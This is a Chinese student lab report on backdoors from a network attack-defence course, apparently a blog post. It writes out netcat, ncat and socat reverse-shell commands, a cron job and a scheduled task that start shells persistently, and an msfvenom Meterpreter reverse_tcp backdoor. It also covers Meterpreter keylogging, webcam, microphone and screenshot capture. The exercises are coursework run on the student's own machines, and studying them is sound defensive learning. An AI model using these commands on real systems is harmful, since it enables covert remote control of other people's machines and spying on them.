后门原理与实践


windows获取Linux操作Shell

  • 获取本机的IP

  • netcat介绍:一个进行基本的TCP、UDP数据收发的工具

  • 相关的参数与具体用法

  • windows打开监听: ncat.exe -l -p 5320(学号)

  • Linux反弹连接windows nc IP 5320(学号) -e /bin/sh

  • windows命令行内输入ls,查看实验结果如下:

Linux获取Windows操作shell

  • Linux运行监听:nc -l -p 5320

  • Windows反连接Linux: ncat.exe -e cmd.exe ip_of_linux 5320

  • Linux下能够看到windows命令行的提示符,实验结果如下:

使用ncat进行数据的传输

  • Linux运行监听

  • Windows反连接Linux

  • Linux命令行中输入数据,Windows能收到:

使用ncat进行文件传输

  • windows运行监听 ncat.exe -l 5320 > 20165320.txt

  • Linux反连接windows nc 192.168.1.143 5320 < 20165320.txt

  • 查看运行结果如下:

  • 过程中遇到的问题:我尝试过用Linux运行监听,windows反连接Linux,但是一直提示“由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接尝试失败”,尝试过关闭防火墙,但是依旧没有用,目前还没找到问题所在。


使用netcat获取主机操作的Shell,cron启动

  • 在win10系统下启动监听:ncat.exe -l 5320

  • 在Kali中使用crontab指令编辑一条任务,在任务的最后一行添加这样一行:每小时多少分钟进行一次反连接 + * * * * /bin/netcat 监听的主机的IP 5320 -e /bin/sh

  • 等到时间在win10命令行中输入相关命令查看实验结果:

使用socat获取主机操作Shell,任务计划启动

  • socat相关介绍:查找学姐的博客的相关内容能了解到socat是ncat的增强版,能够建立两个双向的字节流传输数据,具体格式为 socat + 选项 + 地址 + 地址

  • 在win10系统进入计算机管理界面

  • 创建一个任务并添加一个触发器,在操作选项中添加socat的文件路径,并在添加参数输入框中输入:tcp-listen:5320 exec:cmd.exe,pty,stderr (命令前面能看懂是将cmd.exe与端口号绑定,后面那一串只知道stderr是标准错误输出设备,stdout是标准输入设备)

  • 锁屏后重新登陆查看到改任务已经运行成功

  • 在Kali虚拟机的命令行中输入如下指令:socat - tcp:192.168.1.143:5320,实验结果如下:

使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 在Kali上输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击主机IP LPORT=5320 -f exe > 20165320_backdoor.exe生成一个后门程序,其中LHOST与LPORT应该是后门程序在被攻击主机中运行时,反连接所需要的地址与端口号。

  • 然后通过nc与ncat.exe将后门程序传送到被攻击主机

  • 在Kali虚拟机使用msfconsole指令进入控制台,使用监听模块设置payload,设置反弹回连的IP和端口,设置完成后执行监听。

  • windows运行后门程序,此时Kali能获得windows的远程Shell,结果如下:

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容

  • 使用getuid指令获取用户名

  • 使用record_mic指令截获一段音频

  • 使用webcam获取摄像头的权限进行拍照:

  • 使用screenshot进行截屏

  • 使用keyscan_start指令记录击键过程,使用keyscan_dump获取相关记录


  • 例举你能想到的一个后门进入到你系统中的可能方式

    答:一个很明显的方式就是很多同学在某些游戏网站上下载盗版游戏时会有很多捆绑软件,这些软件毫无疑问是一些后门程序

  • 例举你知道的后门如何启动起来(win及linux)的方式?

    答:钓鱼,诱使用户点击一些不明链接,打开一些不明文件,图片

  • Meterpreter有哪些给你映像深刻的功能?

    答:能生成一些后门程序,这个比较方便

  • 如何发现自己有系统有没有被安装后门?

    答:好像能通过查看系统进程与一些自启动项,装杀毒软件来进行防护


实验体会

  • 这一次实验能让自己有一种真正接触到网络攻防的感觉,但是仔细想了一下,做的还是一些特别简单的东西,现实生活中很难使用这样的手段达到攻击的目标,所以还需要努力学习专业知识,争取能学到一些比较厉害的技术。

2018-2019-2 网络对抗技术 20165320 Exp2 后门原理与实践的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  2. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  3. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  4. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  5. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  6. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

  7. 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...

  8. 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...

  9. 2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载自己不熟悉的软件时含有病毒. 网络钓鱼, ...

随机推荐

  1. POJ1905-Expanding Rods-二分答案

    一根细棒升温时会变长,在两面墙中间,会变成一个弓形. 给出变长后的长度,求新的细棒中心与没伸长时的中心的距离. 简单的数学推导后就可以二分答案了,一开始没完全掌握二分的姿势,wa了好多.而且poj d ...

  2. LightOJ - 1265 (概率)

    题意: 1.两只老虎相遇 就互相残杀 2.老虎与鹿相遇 鹿死 3.老虎与人相遇 人死 4.人与鹿相遇     鹿死 5.鹿与鹿相遇     无果 求人活的概率 解析:如果老虎为0  则人活得概率为1 ...

  3. 自学Linux Shell5.1-shell父子关系

    点击返回 自学Linux命令行与Shell脚本之路 5.1-shell父子关系 1 shell常见的种类  bash是Linux标准默认的Shell,是BunrneAgain Shell的缩写,内部命 ...

  4. 自学Linux Shell12.6-嵌套循环for命令

    点击返回 自学Linux命令行与Shell脚本之路 12.6-嵌套循环for命令 嵌套循环就是在一个循环中还有一个循环. 内部循环在外部循环体中,在外部循环的每次执行过程中都会触发内部循环,直到内部循 ...

  5. BZOJ 4671 异或图 | 线性基 容斥 DFS

    题面 Description 定义两个结点数相同的图 G1 与图 G2 的异或为一个新的图 G, 其中如果 (u, v) 在 G1 与 G2 中的出现次数之和为 1, 那么边 (u, v) 在 G 中 ...

  6. SharePoint 2013 APP 开发示例 (一)List 读写

    在这个示例里,我们将创建一个页面测试 SharePoint APP的权限.这个页面有二个按钮,一个从documents里读数据,一个往documents里写数据: 1. 打开Visual Studio ...

  7. 洛谷 P2746 [USACO5.3]校园网Network of Schools 解题报告

    P2746 [USACO5.3]校园网Network of Schools 题目描述 一些学校连入一个电脑网络.那些学校已订立了协议:每个学校都会给其它的一些学校分发软件(称作"接受学校&q ...

  8. Segment 李超线段树

    题目大意: 要求在平面直角坐标系下维护两个操作: 1.在平面上加入一条线段.记第 i 条被插入的线段的标号为 i 2.给定一个数 k,询问与直线 x = k 相交的线段中,交点最靠上的线段的编号. 若 ...

  9. 【模板】堆优化Dijkstra

    Dij的核心思想:全局最小值不会被其他节点更新,因此得到最小值后只需要扩展一次即可. 概念:扩展.出队 注意:vis[ ]数组表示的是每个节点是否扩展过,因此开始时vis[st]不置1. 时间复杂度\ ...

  10. 1: java开发_""和null的区别

    原文地址:http://www.cnblogs.com/hongten/archive/2012/11/08/java_null.html 在代码中: 1 //name可以为"", ...